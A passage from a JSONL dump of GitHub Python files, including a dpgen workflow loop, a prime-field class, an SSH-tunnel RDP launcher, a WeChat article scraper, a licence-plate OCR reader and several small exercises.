monty.serialization import loadfn, dumpfn\n warnings.simplefilter(\n 'ignore', ruamel.yaml.error.MantissaNoDotYAML1_1Warning)\n jdata = loadfn(param_file)\n mdata = loadfn(machine_file)\n except:\n with open(param_file, 'r') as fp:\n jdata = json.load(fp)\n with open(machine_file, 'r') as fp:\n mdata = json.load(fp)\n\n if jdata.get('pretty_print', False):\n fparam = SHORT_CMD+'_' + \\\n param_file.split('.')[0]+'.'+jdata.get('pretty_format', 'json')\n dumpfn(jdata, fparam, indent=4)\n fmachine = SHORT_CMD+'_' + \\\n machine_file.split('.')[0]+'.'+jdata.get('pretty_format', 'json')\n dumpfn(mdata, fmachine, indent=4)\n\n if mdata.get('handlers', None):\n if mdata['handlers'].get('smtp', None):\n que = queue.Queue(-1)\n queue_handler = logging.handlers.QueueHandler(que)\n smtp_handler = logging.handlers.SMTPHandler(\n **mdata['handlers']['smtp'])\n listener = logging.handlers.QueueListener(que, smtp_handler)\n dlog.addHandler(queue_handler)\n listener.start()\n\n max_tasks = 10000\n numb_task = 9\n record = \"record.dpgen\"\n iter_rec = [0, -1]\n if os.path.isfile(record):\n with open(record) as frec:\n for line in frec:\n iter_rec = [int(x) for x in line.split()]\n dlog.info(\"continue from iter %03d task %02d\" %\n (iter_rec[0], iter_rec[1]))\n\n cont = True\n ii = -1\n while cont:\n ii += 1\n iter_name = make_iter_name(ii)\n sepline(iter_name, '=')\n for jj in range(numb_task):\n if ii * max_tasks + jj <= iter_rec[0] * max_tasks + iter_rec[1]:\n continue\n task_name = \"task %02d\" % jj\n sepline(\"{} {}\".format(iter_name, task_name), '-')\n jdata['model_devi_jobs'] = [{} for _ in range(ii+1)]\n if ii == 0 and jj < 6:\n if jj == 0:\n log_iter(\"init_pick\", ii, jj)\n init_model(ii, jdata, mdata)\n init_pick(ii, jdata, mdata)\n dlog.info(\"first iter, skip step 1-5\")\n elif jj == 0:\n log_iter(\"make_train\", ii, jj)\n make_train(ii, jdata, mdata)\n elif jj == 1:\n log_iter(\"run_train\", ii, jj)\n mdata = decide_train_machine(mdata)\n #disp = make_dispatcher(mdata['train_machine'])\n run_train(ii, jdata, mdata)\n elif jj == 2:\n log_iter(\"post_train\", ii, jj)\n post_train(ii, jdata, mdata)\n elif jj == 3:\n log_iter(\"make_model_devi\", ii, jj)\n cont = make_model_devi(ii, jdata, mdata)\n if not cont or ii >= jdata.get(\"stop_iter\", ii+1):\n break\n elif jj == 4:\n log_iter(\"run_model_devi\", ii, jj)\n mdata = decide_model_devi_machine(mdata)\n #disp = make_dispatcher(mdata['model_devi_machine'])\n run_model_devi(ii, jdata, mdata)\n elif jj == 5:\n log_iter(\"post_model_devi\", ii, jj)\n post_model_devi(ii, jdata, mdata)\n elif jj == 6:\n log_iter(\"make_fp\", ii, jj)\n make_fp(ii, jdata, mdata)\n elif jj == 7:\n log_iter(\"run_fp\", ii, jj)\n if jdata.get(\"labeled\", False):\n dlog.info(\"already have labeled data, skip run_fp\")\n else:\n mdata = decide_fp_machine(mdata)\n #disp = make_dispatcher(mdata['fp_machine'])\n run_fp(ii, jdata, mdata)\n elif jj == 8:\n log_iter(\"post_fp\", ii, jj)\n if jdata.get(\"labeled\", False):\n dlog.info(\"already have labeled data, skip post_fp\")\n else:\n post_fp(ii, jdata)\n else:\n raise RuntimeError(\"unknown task %d, something wrong\" % jj)\n record_iter(record, ii, jj)\n\n\ndef gen_simplify(args):\n if args.PARAM and args.MACHINE:\n if args.debug:\n dlog.setLevel(logging.DEBUG)\n dlog.info(\"start simplifying\")\n run_iter(args.PARAM, args.MACHINE)\n 
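# note: run_iter resumes from the last \"iter task\" pair stored in record.dpgen, so re-running continues instead of restarting (assumed from the record parsing above)\n    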
dlog.info(\"finished\")\n","repo_name":"fengwangxmu/dpgen_mod","sub_path":"dpgen/simplify/simplify.py","file_name":"simplify.py","file_ext":"py","file_size_in_byte":27485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14430802715","text":"import socket\r\nimport time\r\nlocalIP= \"127.0.0.1\"\r\nlocalPort= 80\r\ncomando=\"\"\r\nvariabie=\"\"\r\nstinga=\"\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\nwhile True:\r\n comando=input(\"inserisci il comando\")\r\n variabie=(input(\"inserisci la variabile\"))\r\n stringa=comando + \"_\" + variabie\r\n s.sendto(stringa.encode(), (localIP, localPort))\r\n\r\ns.close()","repo_name":"BadoinoMatteo/ES_PYTHON_quarta","sub_path":"PHYTON/SOCKET/es4/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32887347328","text":"import numpy as np\n\n\nclass PrimeFieldElement:\n def __init__(self, value, p):\n if isinstance(value, PrimeFieldElement):\n self.value = value.value % p\n else:\n self.value = value % p\n self.p = p\n\n def __add__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return PrimeFieldElement((self.value + other.value) % self.p, self.p)\n\n def __sub__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return PrimeFieldElement((self.value - other.value) % self.p, self.p)\n\n def __mul__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return PrimeFieldElement((self.value * other.value) % self.p, self.p)\n \n def reciprocal(self):\n # Calculate the multiplicative inverse using the extended Euclidean algorithm\n a, b = self.value, self.p\n x, y, u, v = 0, 1, 1, 0\n while a != 0:\n q, r = b // a, b % a\n m, n = x - u * q, y - v * q\n b, a, x, y, u, v = a, r, u, v, m, n\n if b == 1:\n # The multiplicative inverse exists\n return PrimeFieldElement(x % self.p, self.p)\n else:\n raise ValueError(f\"{self.value} has no multiplicative inverse modulo {self.p}\")\n\n def __pow__(self, exponent):\n if not isinstance(exponent, int):\n return ValueError('exponent should be int')\n if exponent < 0:\n multinv = self.reciprocal()\n return multinv ** (-exponent)\n return PrimeFieldElement(pow(self.value, exponent, self.p), self.p)\n\n def __eq__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return self.value == other.value\n \n def __lt__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return self.value < other.value\n\n def __str__(self):\n return str(self.value)\n\n def __repr__(self):\n return str(self.value)\n\n\nclass PrimeField:\n def __init__(self, p, n=1):\n if n != 1:\n return NotImplementedError(f'n != 1 is not supported yet')\n from utils import is_prime\n if not is_prime(p):\n return ValueError('p must be prime')\n self.p = p\n self.n = n\n self.elements = None\n \n if self.n == 1:\n elements = []\n for i in range(0, p):\n elements.append(PrimeFieldElement(i, p))\n self.elements = np.array(elements, dtype=object)\n \n def apply(self, func, x=None, multiplicative=False, unique=False):\n if x is None:\n if multiplicative:\n elements = self.multiplicative()\n else:\n elements = self.elements.copy()\n else:\n elements = 
np.array([PrimeFieldElement(el, self.p) for el in x], dtype=object)\n        print(elements)\n        images = np.array([func(el) for el in elements], dtype=object)\n        if unique:\n            images = np.unique(images)\n        return images\n    \n    def multiplicative(self):\n        return self.elements[1:].copy()\n    \n    def squares(self):\n        squares = self.multiplicative() ** 2\n        squares = np.unique(squares)\n        return squares\n    \n    def __getitem__(self, n):\n        if isinstance(n, int):\n            # If a single integer is provided, return the corresponding element\n            return self.elements[n % self.p]\n        elif isinstance(n, (list, tuple, np.ndarray)):\n            # If a list, tuple, or NumPy array of integers is provided, return a new CustomArrayWrapper\n            # with the selected elements\n            if isinstance(n, (list, tuple)):\n                selected_elements = type(n)(self.elements[[i % self.p for i in n]].copy())\n            else:\n                selected_elements = self.elements[[i % self.p for i in n]].copy()\n            return selected_elements\n        else:\n            raise TypeError(\"Unsupported index type. Use int or iterable of ints.\")\n","repo_name":"thatdeep/galois","sub_path":"galois_field/prime_field.py","file_name":"prime_field.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18182607767","text":"import tkinter as tk\r\nfrom PIL import Image, ImageTk\r\nfrom Weather_graph import plot_graph\r\nfrom News_api import get_news\r\nfrom Ads import display_image\r\n\r\n# this creates the window\r\nwindow = tk.Tk()\r\nwindow.geometry(\"1920x1080\")\r\nwindow.title(\"Smart Fridge App\")\r\n\r\n# this loads the weather graph and puts it in the top left part of the window\r\nimage = Image.open(\"weather_graph.png\")\r\nimage = image.resize((650, 400))\r\nphoto = ImageTk.PhotoImage(image) # this creates a TKINTER PHOTO IMAGE OBJECT with the resized image\r\nlabel = tk.Label(window, image=photo) # this creates a label to display the image\r\nlabel.place(x=0, y=0) # this sets the position of the label\r\n\r\n# this loads the background picture for the news and puts it in the bottom part of the window\r\nuser_image = Image.open(\"Breaking_news2.png\")\r\nuser_image = user_image.resize((1920, 680))\r\nuser_photo = ImageTk.PhotoImage(user_image)\r\nuser_label = tk.Label(window, image=user_photo)\r\nuser_label.place(x=0, y=400)\r\n\r\n# this loads the ads and puts it at the top right part of the window\r\nad_image = Image.open(\"random_image.png\")\r\nad_image = ad_image.resize((650, 400))\r\nad_photo = ImageTk.PhotoImage(ad_image)\r\nad_label = tk.Label(window, image=ad_photo)\r\nad_label.place(x=650, y=0)\r\n\r\nwindow.mainloop()\r\n","repo_name":"Roxybuel/GLprojects","sub_path":"Smart_fridge_app.py","file_name":"Smart_fridge_app.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71729912872","text":"import yaml\nimport subprocess\nimport signal\nimport socket\nimport time\nimport os\n\nDIRNAME = os.path.dirname(__file__)\n\ntunnel_process = None # Global variable to hold the SSH process\nrdp_process = None\n\n\ndef terminate_processes(signal, frame):\n    global tunnel_process, rdp_process\n    print(\"\\nExiting\")\n    if tunnel_process is not None and tunnel_process.poll() is None: # Check if process still running\n        tunnel_process.terminate()\n    if rdp_process is not None:\n        rdp_process.terminate()\n    exit(0)\n    \n    \ndef is_tunnel_up():\n    try:\n        with socket.create_connection((\"localhost\", 13389), timeout=1):\n            return 
True\n except socket.error:\n return False\n\n\ndef main():\n global tunnel_process, rdp_process\n\n # Set up signal handler for SIGINT (CTRL-C)\n signal.signal(signal.SIGINT, terminate_processes)\n\n # Load configuration from YAML file\n with open(os.path.join(DIRNAME, 'rdc_config.yaml'), 'r') as file:\n config = yaml.safe_load(file)\n\n # Display menu\n for i, host in enumerate(config['hosts'], start=1):\n print(f\"{i}. {host['name']}\")\n \n # Prompt user to select remote host\n selection_input = input('Enter number: ')\n try:\n selection = int(selection_input) - 1\n except Exception as e:\n exit(f\"Error: {e}\")\n \n selected_host = config['hosts'][selection]\n\n # Create SSH tunnel\n tunnel_cmd = (\n f\"ssh -L 13389:localhost:{selected_host['rdp_remote_port']} \"\n f\"-p {selected_host['ssh_port']} \"\n f\"{selected_host['user']}@{selected_host['hostname']} -N\"\n )\n print(\"Starting SSH tunnel...\")\n print(tunnel_cmd)\n\n tunnel_process = subprocess.Popen(tunnel_cmd)\n while tunnel_process is not None and not is_tunnel_up():\n if tunnel_process.poll() is not None:\n exit(1)\n time.sleep(1)\n print(\"SSH tunnel is up!\\n\")\n\n try:\n # Start Remote Desktop Connection\n # rdp_command = ['mstsc', '/v:localhost:13389', f\"/user:{selected_host['user']}\", f'/pass:{rdp_password}']\n rdp_command = ['mstsc', os.path.join(DIRNAME, 'rdc_client_config.rdc'), '/v:localhost:13389', \"/f\"]\n print(\"Starting RDP connection...\\n\")\n rdp_process = subprocess.run(rdp_command, shell=False)\n except Exception as e:\n print(f\"Error: {e}\")\n finally:\n # Terminate SSH tunnel\n if tunnel_process is not None and tunnel_process.poll() is None: # Check if process still running\n tunnel_process.terminate()\n print(\"Terminated SSH tunnel\")\n print(\"Exiting\")\n exit(0)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rechim25/rdc-setup","sub_path":"rdc_connect.py","file_name":"rdc_connect.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70336542632","text":"'''IP代理及微信推文爬取实战 by 王宇韬'''\n#如果下面的内容被我注释掉了,大家可以选中,然后ctrl+/(Spyder中的快捷键是ctrl+1)取消注释\n\n'''4:微信推文爬取实战之爬取当天新闻'''\n#下面的IP代理的API地址得你自己买一下才能运行成功。\nimport requests\nimport re\nimport time\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}\n\nfrom urllib.parse import quote\ndef weixin(company):\n headers['Referer'] = 'https://weixin.sogou.com/weixin?type=2&query=' + quote(company)\n url = 'https://weixin.sogou.com/weixin?type=2&query=' + company + '&tsn=1'\n res = requests.get(url, headers=headers, timeout=10).text\n # print(res)\n\n p_href = 'data-share=\"(.*?)\">.*?'\n p_title = 'data-share=\".*?\">(.*?)'\n p_date = 'timeConvert\\(\\'(.*?)\\'\\)'\n href = re.findall(p_href, res)\n title = re.findall(p_title, res)\n date = re.findall(p_date, res)\n\n for i in range(len(title)):\n title[i] = re.sub('<.*?>', '', title[i])\n title[i] = re.sub('&.*?;', '', title[i])\n href[i] = re.sub('amp;', '', href[i])\n timestamp = int(date[i])\n timeArray = time.localtime(timestamp)\n date[i] = time.strftime(\"%Y-%m-%d\", timeArray)\n print(str(i + 1) + '.' 
+ title[i] + ' - ' + date[i])\n        print(href[i])\n\ncompanys = ['华能信托', '阿里巴巴', '万科集团', '百度', '腾讯']\nfor i in companys:\n    try:\n        weixin(i)\n        print(i + '该公司微信推文爬取成功')\n    except:\n        print(i + '该公司微信推文爬取失败')\n","repo_name":"zbh123/hobby","sub_path":"Python金融实战资料/源代码 201906更新/第11课:IP代理及微信推文实战/4.微信推文爬取实战之爬取当天文章.py","file_name":"4.微信推文爬取实战之爬取当天文章.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"44263155575","text":"import cv2\nimport numpy as np\nimport pytesseract\nfrom PIL import Image\n\nclass PlateReader:\n    def __init__(self):\n        self.font = cv2.FONT_HERSHEY_PLAIN\n\n    def load_model(self, weight_path: str, cfg_path: str):\n        self.net = cv2.dnn.readNet(weight_path, cfg_path)\n        with open(\"classes-ocr.names\", \"r\") as f:\n            self.classes = [line.strip() for line in f.readlines()]\n        self.layers_names = self.net.getLayerNames()\n\n        unconnected_layers = self.net.getUnconnectedOutLayers()\n        if unconnected_layers.ndim == 1: # Scalar indices\n            self.output_layers = [self.layers_names[i - 1] for i in unconnected_layers]\n        else: # Assume it's an array of indices\n            self.output_layers = [self.layers_names[i[0] - 1] for i in unconnected_layers]\n\n        self.colors = np.random.uniform(0, 255, size=(len(self.classes), 3))\n\n    def load_image(self, img_path):\n        img = cv2.imread(img_path)\n        if img is None:\n            raise FileNotFoundError(f\"Image not found: {img_path}\")\n        height, width, channels = img.shape\n        return img, height, width, channels\n\n    def read_plate(self, img):\n        blob = cv2.dnn.blobFromImage(img, scalefactor=0.00392, size=(320, 320), mean=(0, 0, 0), swapRB=True, crop=False)\n        self.net.setInput(blob)\n        outputs = self.net.forward(self.output_layers)\n        return blob, outputs\n\n    def get_boxes(self, outputs, width, height, threshold=0.3):\n        boxes = []\n        confidences = []\n        class_ids = []\n        for output in outputs:\n            for detect in output:\n                scores = detect[5:]\n                class_id = np.argmax(scores)\n                confidence = scores[class_id]\n                if confidence > threshold:\n                    center_x = int(detect[0] * width)\n                    center_y = int(detect[1] * height)\n                    w = int(detect[2] * width)\n                    h = int(detect[3] * height)\n                    x = int(center_x - w/2)\n                    y = int(center_y - h / 2)\n                    boxes.append([x, y, w, h])\n                    confidences.append(float(confidence))\n                    class_ids.append(class_id)\n        return boxes, confidences, class_ids\n\n    def draw_labels(self, boxes, confidences, class_ids, img):\n        indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\n        characters = []\n        for i in indexes:\n            box = boxes[i]\n            x, y, w, h = box\n            self.draw_label(img, x, y, w, h, confidences[i], i)\n            label = str(self.classes[class_ids[i]])\n            characters.append((label, x))\n        characters.sort(key=lambda x: x[1])\n        plate = self.convert_to_plate_string(characters)\n        return img, plate\n\n    def draw_label(self, img, x, y, w, h, confidence, i):\n        color = self.colors[i % len(self.colors)]\n        cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\n        cv2.putText(img, f\"{confidence:.2f}%\", (x, y - 6), self.font, 1, color, 2)\n\n    def convert_to_plate_string(self, characters):\n        plate = \"\"\n        for label, _ in characters:\n            plate += self.convert_to_arabic_if_needed(label)\n\n        # Handle the specific pattern of numbers followed by 'ww'\n        plate = self.handle_ww_pattern(plate)\n\n        return plate\n\n    def handle_ww_pattern(self, plate):\n        if 'w' in plate:\n            # Extract the 
number part before 'ww'\n print(plate)\n number_part = plate.split('ww')[0]\n # Remove any spaces or decorative elements\n number_part = ''.join(filter(str.isdigit, number_part))\n # Reconstruct the plate with 'ww'\n return number_part + ' ww'\n return plate\n\n def convert_to_arabic_if_needed(self, label):\n arabic_mappings = {'أ': 'A', 'ب': 'B', 'ج': 'J', 'د': 'D', 'ه': 'H', 'و': 'W', 'ي': 'Y'}\n return arabic_mappings.get(label, label)\n\n def tesseract_ocr(self, image, lang=\"eng\", psm=7):\n try:\n alphanumeric = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"\n options = f\"-l {lang} --psm {psm} -c tessedit_char_whitelist={alphanumeric}\"\n return pytesseract.image_to_string(image, config=options)\n except Exception as e:\n print(f\"OCR Error: {e}\")\n return \"\"","repo_name":"LeHaroun/LPAD","sub_path":"plate_reader.py","file_name":"plate_reader.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74192480874","text":"from django.urls import path\n\nfrom .views.flights import Flights\nfrom .views.url_shortcuts import UrlShortcutsIndex\nfrom .views.url_shortcuts import UrlShortcutsRows\n\nurlpatterns = [\n path(\"\", Flights.index, name='index'),\n path(\"list\", Flights.list, name='flights-list'),\n # path(\"list/\", Flights.list, name='flights-list'),\n path(\"create\", Flights.create, name='flights-create'),\n path(\"create-btn\", Flights.create_btn, name='flights-create-btn'),\n path(\"edit/\", Flights.edit, name='flights-edit'),\n path(\"get/\", Flights.get, name='flights-get'),\n path(\"url-shortcuts/\", UrlShortcutsIndex.as_view(), name='url_shortcuts_index'),\n path(\"url-shortcuts/rows\", UrlShortcutsRows.as_view(), name='url_shortcuts_rows')\n]","repo_name":"SWojcik800/Django-Htmx-Samples","sub_path":"django_htmx_samples/flights/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17708965932","text":"from typing import Any, Callable, Iterable, Optional\n\nfrom ignite.engine import Events\nfrom torch import profiler\nfrom torch.profiler import ProfilerActivity\n\nfrom flame.core.engine.engine import Engine\n\n\nclass profile(profiler.profile):\n def __init__(\n self,\n wait: int,\n warmup: int,\n active: int,\n repeat: int = 0,\n skip_first: int = 0,\n activities: Optional[Iterable[ProfilerActivity]] = None,\n on_trace_ready: Optional[Callable[..., Any]] = None,\n record_shapes: bool = False,\n profile_memory: bool = False,\n with_stack: bool = False,\n with_flops: bool = False,\n ):\n schedule = profiler.schedule(wait=wait, warmup=warmup, active=active, repeat=repeat, skip_first=skip_first)\n super(profile, self).__init__(\n activities=activities,\n schedule=schedule,\n on_trace_ready=on_trace_ready,\n record_shapes=record_shapes,\n profile_memory=profile_memory,\n with_stack=with_stack,\n with_flops=with_flops,\n )\n\n self.steps = (wait + warmup + active) * repeat + skip_first\n\n def step(self, engine: Engine) -> None:\n super(profile, self).step()\n\n if self.step_num >= self.steps:\n engine.terminate()\n\n def attach(self, engine: Engine) -> None:\n engine.state.epoch_length = self.steps\n\n if not engine.has_event_handler(self.step, Events.ITERATION_COMPLETED):\n engine.add_event_handler(Events.ITERATION_COMPLETED, 
self.step)\n","repo_name":"phungpx/flamev2","sub_path":"flame/handlers/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"22454255136","text":"import matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS\n\n\ndef WCLOUD(stpwrd, imgfname=\"wordcloud.png\", w=400, h=400):\n\n    # Read the tweets\n    file = open(\"res.csv\", \"r\")\n    text = \"\"\n    for line in file.readlines():\n        text += line.split(\",\")[2] + \" \"\n\n    # Words the system should not take into account\n    g_stopwords = stpwrd\n    # optionally add: stopwords=STOPWORDS and change the arg below\n\n    def generate_wordcloud(text):\n        wordcloud = WordCloud(font_path='Roboto_Slab/RobotoSlab-Regular.ttf', # the font used\n                              relative_scaling=1,\n                              width=w, # size of the final image, which also determines the resolution of the words\n                              height=h,\n                              stopwords=g_stopwords).generate(text)\n        plt.imsave(imgfname, wordcloud)\n\n    generate_wordcloud(text)\n","repo_name":"jeanlapostolle/TwittAnalysis","sub_path":"wcloud.py","file_name":"wcloud.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36689110880","text":"# Grade book starts with a variable from last year; it holds a list of (subject, grade) tuples\r\nlast_semester_gradebook = [(\"politics\", 80), (\"latin\", 96), (\"dance\", 97), (\"architecture\", 65)]\r\n\r\n# Create a new list of classes for this year\r\nsubjects = [\"physics\", \"calculus\", \"poetry\", \"history\"]\r\n# Create a new list of grades for this year, in order of classes\r\ngrades = [98, 97, 85, 88]\r\n\r\n# Add a new class to list \"subjects\" you just finished called \"computer science\"\r\nsubjects.append(\"computer science\")\r\n# Add a new grade to list \"grades\" with a score of 100\r\ngrades.append(100)\r\n\r\n# Combine lists \"subjects\" and \"grades\" into a new list called \"gradebook\"\r\ngradebook = list(zip(subjects, grades)) # materialize the zip: the iterator would be exhausted after its first use\r\n\r\nprint(gradebook) # Print to confirm output\r\n\r\n# Combine this year's list \"gradebook\" with last year's list \"last_semester_gradebook\"\r\nfull_gradebook = gradebook + list(last_semester_gradebook)\r\n\r\nprint(full_gradebook) # Print to confirm output\r\n","repo_name":"ChuckleWacker/Python","sub_path":"Week4_GradeBook_Project.py","file_name":"Week4_GradeBook_Project.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118713833","text":"from itertools import accumulate\n\n\n# https://leetcode.com/problems/maximum-product-of-the-length-of-two-palindromic-substrings/discuss/1389421/Python-O(n)-with-Manacher-explained\nclass Solution:\n    def maxProduct(self, s: str) -> int:\n        t1 = self.helper(s)\n        t2 = self.helper(s[::-1])[::-1][1:] + [0]\n\n        return max(x * y for x, y in zip(t1, t2))\n\n    def manachers(self, s):\n        a = '@#' + '#'.join(s) + '#$'\n        z = [0] * len(a)\n        center = right = 0\n\n        for i in range(1, len(a) - 1):\n            if i < right:\n                z[i] = min(right - i, z[2 * center - i])\n            while a[i + z[i] + 1] == a[i - z[i] - 1]:\n                z[i] += 1\n            if i + z[i] > right:\n                center = i\n                right = i + z[i]\n\n        return z[2:-2:2]\n\n    def helper(self, s):\n        man = self.manachers(s)\n        n = len(s)\n        ints = [(i - man[i] // 2, i + man[i] // 2) 
for i in range(n)]\n arr = [0] * n\n\n for a, b in ints:\n arr[b] = max(arr[b], b - a + 1)\n\n for i in range(n - 2, -1, -1):\n arr[i] = max(arr[i], arr[i + 1] - 2)\n\n return list(accumulate(arr, max))\n","repo_name":"cabulous/leetcode","sub_path":"python/1960.py","file_name":"1960.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18491349736","text":"from django.shortcuts import render\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport joblib\r\nimport matplotlib.pyplot as plt\r\nfrom fastai.tabular.all import *\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef covid1(request):\r\n df = pd.read_csv('static/covid11.csv')\r\n data = df.values\r\n X = data[:, :-1]\r\n Y = data[:, -1:]\r\n value = ''\r\n\r\n if request.method == 'POST': \r\n age = float(request.POST['temp'])\r\n sex = float(request.POST['bp'])\r\n cp = float(request.POST['age'])\r\n trestbps = float(request.POST['nose'])\r\n chol = float(request.POST['breath'])\r\n chol1 = float(request.POST['ht'])\r\n chol2= float(request.POST['a'])\r\n chol3 = float(request.POST['b'])\r\n chol4 = float(request.POST['c'])\r\n chol5 = float(request.POST['d'])\r\n chol6 = float(request.POST['e'])\r\n chol7 = float(request.POST['f'])\r\n\r\n data = np.array(\r\n (age,\r\n sex,\r\n cp,\r\n trestbps,\r\n chol,chol1,chol2,chol3,chol4,chol5,chol6,2,2,2\r\n )\r\n ).reshape(1, 14)\r\n rand_forest=joblib.load(\"/home/jishnusaurav/Downloads/priovax-main/machine-learning/model.pkl\")\r\n predictions = rand_forest.predict(data)\r\n x=str(predictions[0])\r\n print(predictions[0])\r\n print(\"123\")\r\n if(x==\"1\"):\r\n x=\"You should get vaccinated!\"\r\n else:\r\n x=\"You need not get vaccinated right now!\"\r\n return render(request,\r\n 'diseasepredictor/rforest.html',\r\n {\r\n 'context': x\r\n })\r\n else:\r\n return render(request,\r\n 'diseasepredictor/rforest.html',\r\n {\r\n 'context': \"No data\"\r\n })\r\ndef covid2(request):\r\n df = pd.read_csv('static/covid22.csv')\r\n data = df.values\r\n X = data[:, :-1]\r\n Y = data[:, -1]\r\n print(X.shape, Y.shape)\r\n\r\n value = ''\r\n if request.method == 'POST':\r\n\r\n temp = request.POST['temp']\r\n age = request.POST['age']\r\n bp = request.POST['bp']\r\n nose = request.POST['nose']\r\n breath = request.POST['breath']\r\n\r\n if bp=='Yes' or bp == 'yes' or bp=='YES':\r\n bp=1\r\n elif bp=='No' or bp == 'no' or bp=='NO':\r\n bp=0\r\n \r\n else:\r\n return render(request,\r\n 'diseasepredictor/rforest.html',\r\n {\r\n 'context': value,\r\n 'error':\"Please enter correct data\"\r\n })\r\n \r\n if nose=='Yes' or nose == 'yes' or nose=='YES':\r\n nose=1\r\n elif nose=='No' or nose == 'no' or nose=='NO':\r\n nose=0\r\n else:\r\n return render(request,\r\n 'diseasepredictor/knn.html',\r\n {\r\n 'context': value,\r\n 'error':\"Please enter correct data\"\r\n })\r\n if breath=='Yes' or breath == 'yes' or breath=='YES':\r\n breath=1\r\n elif breath=='No' or breath == 'no' or breath=='NO':\r\n breath=0\r\n else:\r\n return render(request,\r\n 'diseasepredictor/knn.html',\r\n {\r\n 'context': value,\r\n 'error':\"Please enter correct data\"\r\n })\r\n\r\n user_data = np.array(\r\n (temp,\r\n bp,\r\n age,\r\n nose,\r\n breath\r\n )\r\n ).reshape(1, 5)\r\n\r\n\r\n rf = KNeighborsClassifier()\r\n rf.fit(np.nan_to_num(X), Y)\r\n\r\n predictions = rf.predict(user_data)\r\n 
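# note: the feature order in user_data must match the training csv columns (temp, bp, age, nose, breath)\r\n        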
print(predictions)\r\n\r\n if int(predictions[0]) == 1:\r\n value = 'You May have COVID-19 Virus. Kindly get in contact with a Doctor!!!'\r\n elif int(predictions[0]) == 0:\r\n value = \"You are SAFE!!!\"\r\n\r\n return render(request,\r\n 'diseasepredictor/knn.html',\r\n {\r\n 'context': value\r\n })\r\n\r\n\r\ndef home(request):\r\n\r\n return render(request,\r\n 'diseasepredictor/predict.html')\r\n\r\n\r\n\r\n# def handler404(request):\r\n# return render(request, '404.html', status=404)\r\n","repo_name":"jishnusaurav/CovTech","sub_path":"diseasepredictor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4288655457","text":"from collections import Counter\nimport sys, pdb, csv, pdb, math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom collections import defaultdict\n\n# csvfile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\")\n# columns = ['order_id', 'user_id']\n# df1 = pd.DataFrame(csvfile, columns=columns)\n# # print(df1.head())\n#\n# for i in range(500):\n# print(df1.iloc[i]['order_id'])\n\ndef numIterms(): #gives us a dictionary with key as the user id and the value as the number of times they've ordered\n finalDict = Counter()\n d = defaultdict(list)\n i = 0\n retCountDict = Counter()\n numTimesOrdered = Counter()\n ordersFile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/order_products__traint.csv\",dtype=str)\n readerFile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orderst.csv\")\n colForReaders = [\"order_id\",\"user_id\"]\n colForOrders = [\"order_id\"]\n reader = pd.DataFrame(readerFile, columns = colForReaders)\n orders = pd.DataFrame(ordersFile, columns = colForOrders)\n\n traintList = orders.values\n userList = reader.values\n\n for temp in userList:\n numTimesOrdered[temp[1]] += 1\n\n for i in range(len(traintList)):\n retCountDict[traintList[i][0]] += 1 #it's the dictionary where the key is the order id and the value is the number of items\n for i in range(len(userList)):\n userID = userList[i][1]\n orderID = userList[i][0]\n\n if(retCountDict[str(orderID)]) != 0:\n finalDict[userID] += 